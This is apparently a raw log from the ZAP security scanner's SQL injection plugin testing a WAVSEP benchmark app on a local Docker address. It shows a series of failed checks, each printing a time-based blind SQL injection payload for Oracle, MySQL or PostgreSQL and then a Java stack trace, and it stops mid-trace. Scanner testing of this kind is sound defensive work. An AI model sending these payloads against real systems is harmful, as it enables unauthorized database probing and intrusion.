[http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(117)||CHR(87)||CHR(78),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(117)||CHR(87)||CHR(78),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679302 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND (SELECT * FROM (SELECT(SLEEP(5)))WrJy) AND ('eJvI'='eJvI] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND (SELECT * FROM (SELECT(SLEEP(5)))WrJy) AND ('eJvI'='eJvI at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679303 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(100)||CHR(105)||CHR(83),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(100)||CHR(105)||CHR(83),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679304 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND (SELECT * FROM (SELECT(SLEEP(5)))PLoL) AND 'hjCk'='hjCk] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND (SELECT * FROM (SELECT(SLEEP(5)))PLoL) AND 'hjCk'='hjCk at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679305 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(87)||CHR(101)||CHR(65),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(87)||CHR(101)||CHR(65),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679306 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND (SELECT * FROM (SELECT(SLEEP(5)))LGDo) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND (SELECT * FROM (SELECT(SLEEP(5)))LGDo) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679306 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(102)||CHR(111)||CHR(75)||CHR(112),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(102)||CHR(111)||CHR(75)||CHR(112),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679307 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND (SELECT * FROM (SELECT(SLEEP(5)))VyuR)-- QVIb] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND (SELECT * FROM (SELECT(SLEEP(5)))VyuR)-- QVIb at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679307 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND (SELECT * FROM (SELECT(SLEEP(5)))yqOb) AND (1012=1012] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND (SELECT * FROM (SELECT(SLEEP(5)))yqOb) AND (1012=1012 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679309 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 5803=(SELECT 5803 FROM PG_SLEEP(5)) AND (6836=6836] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 5803=(SELECT 5803 FROM PG_SLEEP(5)) AND (6836=6836 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679309 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND (SELECT * FROM (SELECT(SLEEP(5)))vHRE)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND (SELECT * FROM (SELECT(SLEEP(5)))vHRE) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679310 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 3982=(SELECT 3982 FROM PG_SLEEP(5))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 3982=(SELECT 3982 FROM PG_SLEEP(5)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679311 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND (SELECT * FROM (SELECT(SLEEP(5)))xvDE) AND ('jtHp'='jtHp] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND (SELECT * FROM (SELECT(SLEEP(5)))xvDE) AND ('jtHp'='jtHp at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679312 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 2491=(SELECT 2491 FROM PG_SLEEP(5)) AND ('gBoP'='gBoP] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 2491=(SELECT 2491 FROM PG_SLEEP(5)) AND ('gBoP'='gBoP at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at 